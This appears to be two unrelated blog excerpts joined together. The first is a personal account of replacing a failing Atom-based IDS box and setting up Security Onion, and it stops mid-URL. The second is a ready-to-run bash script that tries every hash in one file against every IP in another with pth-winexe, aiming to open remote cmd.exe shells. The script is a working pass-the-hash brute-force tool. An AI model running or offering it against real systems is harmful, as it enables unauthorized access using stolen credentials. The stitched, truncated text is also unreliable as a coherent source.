My Setup of Security Onion on the Antsle: Recently my IDS box, an Intel Atom D2500 Fanless Mini-ITX PC, D2500CCE, died. Truth be told, I think it came from the factory in a bad state, as I originally thought I had a bad graphics driver, but I then noticed that, after much troubleshooting, it wasn't a driver issue at all. The box just sometimes wouldn't boot up correctly with video. It seems heat related, something like not enough thermal paste on the CPU, as after it is powered off for a while it is more likely to boot than when it is warm. Along with that issue, this box maxed out at 4GB of RAM (only has 2 memory slots, each of which will only take a 2GB card max) and had a single processor, so it was under powered for Security Onion. So, I decided to quit limping along on P.O.S. boxes, and buy a little more heavyweight box for my networked IDS. Security Onion requires a minimum of 8GB of RAM, and 4 cores per their specs page https://github.com/secur
Here's a simple script to try a list of hashes out against a list of IPs: #!/bin/bash # This pass the hashes in a file of IPs (passed as the FIRST parameter) # and test every hash in a file of hashes (passed as the SECOND parameter) # i.e. root#PassTheHashBruteForcer.sh FileOfIPs.txt FileOfHashes.txt echo "syntax is: " echo "root#PassTheHashBruteForcer.sh FileOfIPs.txt FileOfHashes.txt" while read -r line1 do while IFS='' read -r line2 || [[ -n "$line2" ]]; do #echo "$line1 $line2" echo "/usr/bin/pth-winexe -U $line2 //$line1 cmd.exe" /usr/bin/pth-winexe -U $line2 //$line1 cmd.exe #pth-winexe -U $line //10.11.1.$line1 cmd.exe #echo "Text read from file: $line" done < "$2" done < "$1"